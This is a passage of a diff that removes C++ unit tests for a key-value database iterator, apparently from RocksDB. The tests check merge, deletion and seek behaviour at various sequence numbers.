-                      4, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_4");
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddMerge("a", "merge_2");
-    internal_iter->AddMerge("a", "merge_3");
-    internal_iter->AddDeletion("a");
-    internal_iter->AddMerge("a", "merge_4");
-    internal_iter->AddMerge("a", "merge_5");
-    internal_iter->AddMerge("a", "merge_6");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      5, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_4,merge_5");
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddMerge("a", "merge_2");
-    internal_iter->AddMerge("a", "merge_3");
-    internal_iter->AddDeletion("a");
-    internal_iter->AddMerge("a", "merge_4");
-    internal_iter->AddMerge("a", "merge_5");
-    internal_iter->AddMerge("a", "merge_6");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      6, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_4,merge_5,merge_6");
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-}
-
-TEST_F(DBIteratorTest, DBIterator7) {
-  ReadOptions ro;
-  Options options;
-  options.merge_operator = MergeOperators::CreateFromStringId("stringappend");
-  ImmutableCFOptions cf_options = ImmutableCFOptions(options);
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddPut("b", "val");
-    internal_iter->AddMerge("b", "merge_2");
-
-    internal_iter->AddDeletion("b");
-    internal_iter->AddMerge("b", "merge_3");
-
-    internal_iter->AddMerge("c", "merge_4");
-    internal_iter->AddMerge("c", "merge_5");
-
-    internal_iter->AddDeletion("b");
-    internal_iter->AddMerge("b", "merge_6");
-    internal_iter->AddMerge("b", "merge_7");
-    internal_iter->AddMerge("b", "merge_8");
-    internal_iter->AddMerge("b", "merge_9");
-    internal_iter->AddMerge("b", "merge_10");
-    internal_iter->AddMerge("b", "merge_11");
-
-    internal_iter->AddDeletion("c");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      0, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_1");
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddPut("b", "val");
-    internal_iter->AddMerge("b", "merge_2");
-
-    internal_iter->AddDeletion("b");
-    internal_iter->AddMerge("b", "merge_3");
-
-    internal_iter->AddMerge("c", "merge_4");
-    internal_iter->AddMerge("c", "merge_5");
-
-    internal_iter->AddDeletion("b");
-    internal_iter->AddMerge("b", "merge_6");
-    internal_iter->AddMerge("b", "merge_7");
-    internal_iter->AddMerge("b", "merge_8");
-    internal_iter->AddMerge("b", "merge_9");
-    internal_iter->AddMerge("b", "merge_10");
-    internal_iter->AddMerge("b", "merge_11");
-
-    internal_iter->AddDeletion("c");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      2, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-
-    ASSERT_EQ(db_iter->key().ToString(), "b");
-    ASSERT_EQ(db_iter->value().ToString(), "val,merge_2");
-    db_iter->Prev();
-    ASSERT_TRUE(db_iter->Valid());
-
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_1");
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddPut("b", "val");
-    internal_iter->AddMerge("b", "merge_2");
-
-    internal_iter->AddDeletion("b");
-    internal_iter->AddMerge("b", "merge_3");
-
-    internal_iter->AddMerge("c", "merge_4");
-    internal_iter->AddMerge("c", "merge_5");
-
-    internal_iter->AddDeletion("b");
-    internal_iter->AddMerge("b", "merge_6");
-    internal_iter->AddMerge("b", "merge_7");
-    internal_iter->AddMerge("b", "merge_8");
-    internal_iter->AddMerge("b", "merge_9");
-    internal_iter->AddMerge("b", "merge_10");
-    internal_iter->AddMerge("b", "merge_11");
-
-    internal_iter->AddDeletion("c");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      4, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-
-    ASSERT_EQ(db_iter->key().ToString(), "b");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_3");
-    db_iter->Prev();
-    ASSERT_TRUE(db_iter->Valid());
-
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_1");
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddPut("b", "val");
-    internal_iter->AddMerge("b", "merge_2");
-
-    internal_iter->AddDeletion("b");
-    internal_iter->AddMerge("b", "merge_3");
-
-    internal_iter->AddMerge("c", "merge_4");
-    internal_iter->AddMerge("c", "merge_5");
-
-    internal_iter->AddDeletion("b");
-    internal_iter->AddMerge("b", "merge_6");
-    internal_iter->AddMerge("b", "merge_7");
-    internal_iter->AddMerge("b", "merge_8");
-    internal_iter->AddMerge("b", "merge_9");
-    internal_iter->AddMerge("b", "merge_10");
-    internal_iter->AddMerge("b", "merge_11");
-
-    internal_iter->AddDeletion("c");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      5, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-
-    ASSERT_EQ(db_iter->key().ToString(), "c");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_4");
-    db_iter->Prev();
-
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "b");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_3");
-    db_iter->Prev();
-    ASSERT_TRUE(db_iter->Valid());
-
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_1");
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddPut("b", "val");
-    internal_iter->AddMerge("b", "merge_2");
-
-    internal_iter->AddDeletion("b");
-    internal_iter->AddMerge("b", "merge_3");
-
-    internal_iter->AddMerge("c", "merge_4");
-    internal_iter->AddMerge("c", "merge_5");
-
-    internal_iter->AddDeletion("b");
-    internal_iter->AddMerge("b", "merge_6");
-    internal_iter->AddMerge("b", "merge_7");
-    internal_iter->AddMerge("b", "merge_8");
-    internal_iter->AddMerge("b", "merge_9");
-    internal_iter->AddMerge("b", "merge_10");
-    internal_iter->AddMerge("b", "merge_11");
-
-    internal_iter->AddDeletion("c");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      6, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-
-    ASSERT_EQ(db_iter->key().ToString(), "c");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_4,merge_5");
-    db_iter->Prev();
-    ASSERT_TRUE(db_iter->Valid());
-
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "b");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_3");
-    db_iter->Prev();
-    ASSERT_TRUE(db_iter->Valid());
-
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_1");
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddPut("b", "val");
-    internal_iter->AddMerge("b", "merge_2");
-
-    internal_iter->AddDeletion("b");
-    internal_iter->AddMerge("b", "merge_3");
-
-    internal_iter->AddMerge("c", "merge_4");
-    internal_iter->AddMerge("c", "merge_5");
-
-    internal_iter->AddDeletion("b");
-    internal_iter->AddMerge("b", "merge_6");
-    internal_iter->AddMerge("b", "merge_7");
-    internal_iter->AddMerge("b", "merge_8");
-    internal_iter->AddMerge("b", "merge_9");
-    internal_iter->AddMerge("b", "merge_10");
-    internal_iter->AddMerge("b", "merge_11");
-
-    internal_iter->AddDeletion("c");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      7, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-
-    ASSERT_EQ(db_iter->key().ToString(), "c");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_4,merge_5");
-    db_iter->Prev();
-    ASSERT_TRUE(db_iter->Valid());
-
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_1");
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddPut("b", "val");
-    internal_iter->AddMerge("b", "merge_2");
-
-    internal_iter->AddDeletion("b");
-    internal_iter->AddMerge("b", "merge_3");
-
-    internal_iter->AddMerge("c", "merge_4");
-    internal_iter->AddMerge("c", "merge_5");
-
-    internal_iter->AddDeletion("b");
-    internal_iter->AddMerge("b", "merge_6");
-    internal_iter->AddMerge("b", "merge_7");
-    internal_iter->AddMerge("b", "merge_8");
-    internal_iter->AddMerge("b", "merge_9");
-    internal_iter->AddMerge("b", "merge_10");
-    internal_iter->AddMerge("b", "merge_11");
-
-    internal_iter->AddDeletion("c");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      9, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-
-    ASSERT_EQ(db_iter->key().ToString(), "c");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_4,merge_5");
-    db_iter->Prev();
-    ASSERT_TRUE(db_iter->Valid());
-
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "b");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_6,merge_7");
-    db_iter->Prev();
-    ASSERT_TRUE(db_iter->Valid());
-
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_1");
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddPut("b", "val");
-    internal_iter->AddMerge("b", "merge_2");
-
-    internal_iter->AddDeletion("b");
-    internal_iter->AddMerge("b", "merge_3");
-
-    internal_iter->AddMerge("c", "merge_4");
-    internal_iter->AddMerge("c", "merge_5");
-
-    internal_iter->AddDeletion("b");
-    internal_iter->AddMerge("b", "merge_6");
-    internal_iter->AddMerge("b", "merge_7");
-    internal_iter->AddMerge("b", "merge_8");
-    internal_iter->AddMerge("b", "merge_9");
-    internal_iter->AddMerge("b", "merge_10");
-    internal_iter->AddMerge("b", "merge_11");
-
-    internal_iter->AddDeletion("c");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      13, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-
-    ASSERT_EQ(db_iter->key().ToString(), "c");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_4,merge_5");
-    db_iter->Prev();
-    ASSERT_TRUE(db_iter->Valid());
-
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "b");
-    ASSERT_EQ(db_iter->value().ToString(),
-              "merge_6,merge_7,merge_8,merge_9,merge_10,merge_11");
-    db_iter->Prev();
-    ASSERT_TRUE(db_iter->Valid());
-
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_1");
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddPut("b", "val");
-    internal_iter->AddMerge("b", "merge_2");
-
-    internal_iter->AddDeletion("b");
-    internal_iter->AddMerge("b", "merge_3");
-
-    internal_iter->AddMerge("c", "merge_4");
-    internal_iter->AddMerge("c", "merge_5");
-
-    internal_iter->AddDeletion("b");
-    internal_iter->AddMerge("b", "merge_6");
-    internal_iter->AddMerge("b", "merge_7");
-    internal_iter->AddMerge("b", "merge_8");
-    internal_iter->AddMerge("b", "merge_9");
-    internal_iter->AddMerge("b", "merge_10");
-    internal_iter->AddMerge("b", "merge_11");
-
-    internal_iter->AddDeletion("c");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      14, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-
-    ASSERT_EQ(db_iter->key().ToString(), "b");
-    ASSERT_EQ(db_iter->value().ToString(),
-              "merge_6,merge_7,merge_8,merge_9,merge_10,merge_11");
-    db_iter->Prev();
-    ASSERT_TRUE(db_iter->Valid());
-
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_1");
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-}
-
-TEST_F(DBIteratorTest, DBIterator8) {
-  ReadOptions ro;
-  Options options;
-  options.merge_operator = MergeOperators::CreateFromStringId("stringappend");
-
-  TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-  internal_iter->AddDeletion("a");
-  internal_iter->AddPut("a", "0");
-  internal_iter->AddPut("b", "0");
-  internal_iter->Finish();
-
-  std::unique_ptr<Iterator> db_iter(NewDBIterator(
-      env_, ro, ImmutableCFOptions(options), BytewiseComparator(),
-      internal_iter, 10, options.max_sequential_skip_in_iterations));
-  db_iter->SeekToLast();
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), "b");
-  ASSERT_EQ(db_iter->value().ToString(), "0");
-
-  db_iter->Prev();
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), "a");
-  ASSERT_EQ(db_iter->value().ToString(), "0");
-}
-
-// TODO(3.13): fix the issue of Seek() then Prev() which might not necessary
-//             return the biggest element smaller than the seek key.
-TEST_F(DBIteratorTest, DBIterator9) {
-  ReadOptions ro;
-  Options options;
-  options.merge_operator = MergeOperators::CreateFromStringId("stringappend");
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddMerge("a", "merge_2");
-    internal_iter->AddMerge("b", "merge_3");
-    internal_iter->AddMerge("b", "merge_4");
-    internal_iter->AddMerge("d", "merge_5");
-    internal_iter->AddMerge("d", "merge_6");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(NewDBIterator(
-        env_, ro, ImmutableCFOptions(options), BytewiseComparator(),
-        internal_iter, 10, options.max_sequential_skip_in_iterations));
-
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    db_iter->Prev();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "b");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_3,merge_4");
-    db_iter->Next();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "d");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_5,merge_6");
-
-    db_iter->Seek("b");
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "b");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_3,merge_4");
-    db_iter->Prev();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_1,merge_2");
-
-    db_iter->SeekForPrev("b");
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "b");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_3,merge_4");
-    db_iter->Next();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "d");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_5,merge_6");
-
-    db_iter->Seek("c");
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "d");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_5,merge_6");
-    db_iter->Prev();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "b");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_3,merge_4");
-
-    db_iter->SeekForPrev("c");
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "b");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_3,merge_4");
-    db_iter->Next();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "d");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_5,merge_6");
-  }
-}
-
-// TODO(3.13): fix the issue of Seek() then Prev() which might not necessary
-//             return the biggest element smaller than the seek key.
-TEST_F(DBIteratorTest, DBIterator10) {
-  ReadOptions ro;
-  Options options;
-
-  TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-  internal_iter->AddPut("a", "1");
-  internal_iter->AddPut("b", "2");
-  internal_iter->AddPut("c", "3");
-  internal_iter->AddPut("d", "4");
-  internal_iter->Finish();
-
-  std::unique_ptr<Iterator> db_iter(NewDBIterator(
-      env_, ro, ImmutableCFOptions(options), BytewiseComparator(),
-      internal_iter, 10, options.max_sequential_skip_in_iterations));
-
-  db_iter->Seek("c");
-  ASSERT_TRUE(db_iter->Valid());
-  db_iter->Prev();
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), "b");
-  ASSERT_EQ(db_iter->value().ToString(), "2");
-
-  db_iter->Next();
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), "c");
-  ASSERT_EQ(db_iter->value().ToString(), "3");
-
-  db_iter->SeekForPrev("c");
-  ASSERT_TRUE(db_iter->Valid());
-  db_iter->Next();
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), "d");
-  ASSERT_EQ(db_iter->value().ToString(), "4");
-
-  db_iter->Prev();
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), "c");
-  ASSERT_EQ(db_iter->value().ToString(), "3");
-}
-
-TEST_F(DBIteratorTest, SeekToLastOccurrenceSeq0) {
-  ReadOptions ro;
-  Options options;
-  options.merge_operator = nullptr;
-
-  TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-  internal_iter->AddPut("a", "1");
-  internal_iter->AddPut("b", "2");
-  internal_iter->Finish();
-
-  std::unique_ptr<Iterator> db_iter(
-      NewDBIterator(env_, ro, ImmutableCFOptions(options), BytewiseComparator(),
-                    internal_iter, 10, 0 /* force seek */));
-  db_iter->SeekToFirst();
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), "a");
-  ASSERT_EQ(db_iter->value().ToString(), "1");
-  db_iter->Next();
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), "b");
-  ASSERT_EQ(db_iter->value().ToString(), "2");
-  db_iter->Next();
-  ASSERT_FALSE(db_iter->Valid());
-}
-
-TEST_F(DBIteratorTest, DBIterator11) {
-  ReadOptions ro;
-  Options options;
-  options.merge_operator = MergeOperators::CreateFromStringId("stringappend");
-
-  TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-  internal_iter->AddPut("a", "0");
-  internal_iter->AddPut("b", "0");
-  internal_iter->AddSingleDeletion("b");
-  internal_iter->AddMerge("a", "1");
-  internal_iter->AddMerge("b", "2");
-  internal_iter->Finish();
-
-  std::unique_ptr<Iterator> db_iter(NewDBIterator(
-      env_, ro, ImmutableCFOptions(options), BytewiseComparator(),
-      internal_iter, 1, options.max_sequential_skip_in_iterations));
-  db_iter->SeekToFirst();
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), "a");
-  ASSERT_EQ(db_iter->value().ToString(), "0");
-  db_iter->Next();
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), "b");
-  db_iter->Next();
-  ASSERT_FALSE(db_iter->Valid());
-}
-
-TEST_F(DBIteratorTest, DBIterator12) {
-  ReadOptions ro;
-  Options options;
-  options.merge_operator = nullptr;
-
-  TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-  internal_iter->AddPut("a", "1");
-  internal_iter->AddPut("b", "2");
-  internal_iter->AddPut("c", "3");
-  internal_iter->AddSingleDeletion("b");
-  internal_iter->Finish();
-
-  std::unique_ptr<Iterator> db_iter(
-      NewDBIterator(env_, ro, ImmutableCFOptions(options), BytewiseComparator(),
-                    internal_iter, 10, 0));
-  db_iter->SeekToLast();
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), "c");
-  ASSERT_EQ(db_iter->value().ToString(), "3");
-  db_iter->Prev();
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), "a");
-  ASSERT_EQ(db_iter->value().ToString(), "1");
-  db_iter->Prev();
-  ASSERT_FALSE(db_iter->Valid());
-}
-
-TEST_F(DBIteratorTest, DBIterator13) {
-  ReadOptions ro;
-  Options options;
-  options.merge_operator = nullptr;
-
-  std::string key;
-  key.resize(9);
-  key.assign(9, static_cast<char>(0));
-  key[0] = 'b';
-
-  TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-  internal_iter->AddPut(key, "0");
-  internal_iter->AddPut(key, "1");
-  internal_iter->AddPut(key, "2");
-  internal_iter->AddPut(key, "3");
-  internal_iter->AddPut(key, "4");
-  internal_iter->AddPut(key, "5");
-  internal_iter->AddPut(key, "6");
-  internal_iter->AddPut(key, "7");
-  internal_iter->AddPut(key, "8");
-  internal_iter->Finish();
-
-  std::unique_ptr<Iterator> db_iter(
-      NewDBIterator(env_, ro, ImmutableCFOptions(options), BytewiseComparator(),
-                    internal_iter, 2, 3));
-  db_iter->Seek("b");
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), key);
-  ASSERT_EQ(db_iter->value().ToString(), "2");
-}
-
-TEST_F(DBIteratorTest, DBIterator14) {
-  ReadOptions ro;
-  Options options;
-  options.merge_operator = nullptr;
-
-  std::string key("b");
-  TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-  internal_iter->AddPut("b", "0");
-  internal_iter->AddPut("b", "1");
-  internal_iter->AddPut("b", "2");
-  internal_iter->AddPut("b", "3");
-  internal_iter->AddPut("a", "4");
-  internal_iter->AddPut("a", "5");
-  internal_iter->AddPut("a", "6");
-  internal_iter->AddPut("c", "7");
-  internal_iter->AddPut("c", "8");
-  internal_iter->AddPut("c", "9");
-  internal_iter->Finish();
-
-  std::unique_ptr<Iterator> db_iter(
-      NewDBIterator(env_, ro, ImmutableCFOptions(options), BytewiseComparator(),
-                    internal_iter, 4, 1));
-  db_iter->Seek("b");
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), "b");
-  ASSERT_EQ(db_iter->value().ToString(), "3");
-  db_iter->SeekToFirst();
-  ASSERT_EQ(db_iter->key().ToString(), "a");
-  ASSERT_EQ(db_iter->value().ToString(), "4");
-}
-
-class DBIterWithMergeIterTest : public testing::Test {
- public:
-  DBIterWithMergeIterTest()
-      : env_(Env::Default()), icomp_(BytewiseComparator()) {
-    options_.merge_operator = nullptr;
-
-    internal_iter1_ = new TestIterator(BytewiseComparator());
-    internal_iter1_->Add("a", kTypeValue, "1", 3u);
-    internal_iter1_->Add("f", kTypeValue, "2", 5u);
-    internal_iter1_->Add("g", kTypeValue, "3", 7u);
-    internal_iter1_->Finish();
-
-    internal_iter2_ = new TestIterator(BytewiseComparator());
-    internal_iter2_->Add("a", kTypeValue, "4", 6u);
-    internal_iter2_->Add("b", kTypeValue, "5", 1u);
-    internal_iter2_->Add("c", kTypeValue, "6", 2u);
-    internal_iter2_->Add("d", kTypeValue, "7", 3u);
-    internal_iter2_->Finish();
-
-    std::vector<InternalIterator*> child_iters;
-    child_iters.push_back(internal_iter1_);
-    child_iters.push_back(internal_iter2_);
-    InternalKeyComparator icomp(BytewiseComparator());
-    InternalIterator* merge_iter =
-        NewMergingIterator(&icomp_, &child_iters[0], 2u);
-
-    db_iter_.reset(NewDBIterator(env_, ro_, ImmutableCFOptions(options_),
-                                 BytewiseComparator(), merge_iter,
-                                 8 /* read data earlier than seqId 8 */,
-                                 3 /* max iterators before reseek */));
-  }
-
-  Env* env_;
-  ReadOptions ro_;
-  Options options_;
-  TestIterator* internal_iter1_;
-  TestIterator* internal_iter2_;
-  InternalKeyComparator icomp_;
-  Iterator* merge_iter_;
-  std::unique_ptr<Iterator> db_iter_;
-};
-
-TEST_F(DBIterWithMergeIterTest, InnerMergeIterator1) {
-  db_iter_->SeekToFirst();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "a");
-  ASSERT_EQ(db_iter_->value().ToString(), "4");
-  db_iter_->Next();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "b");
-  ASSERT_EQ(db_iter_->value().ToString(), "5");
-  db_iter_->Next();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "c");
-  ASSERT_EQ(db_iter_->value().ToString(), "6");
-  db_iter_->Next();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "d");
-  ASSERT_EQ(db_iter_->value().ToString(), "7");
-  db_iter_->Next();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "f");
-  ASSERT_EQ(db_iter_->value().ToString(), "2");
-  db_iter_->Next();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "g");
-  ASSERT_EQ(db_iter_->value().ToString(), "3");
-  db_iter_->Next();
-  ASSERT_FALSE(db_iter_->Valid());
-}
-
-TEST_F(DBIterWithMergeIterTest, InnerMergeIterator2) {
-  // Test Prev() when one child iterator is at its end.
-  db_iter_->SeekForPrev("g");
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "g");
-  ASSERT_EQ(db_iter_->value().ToString(), "3");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "f");
-  ASSERT_EQ(db_iter_->value().ToString(), "2");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "d");
-  ASSERT_EQ(db_iter_->value().ToString(), "7");
-  db_iter_->Prev();
-  ASSERT_TRUE(db_iter_->Valid());
-  ASSERT_EQ(db_iter_->key().ToString(), "c");
-  ASSERT_EQ(db_iter_->value().ToString(), "6");
-  db_iter_->Prev();
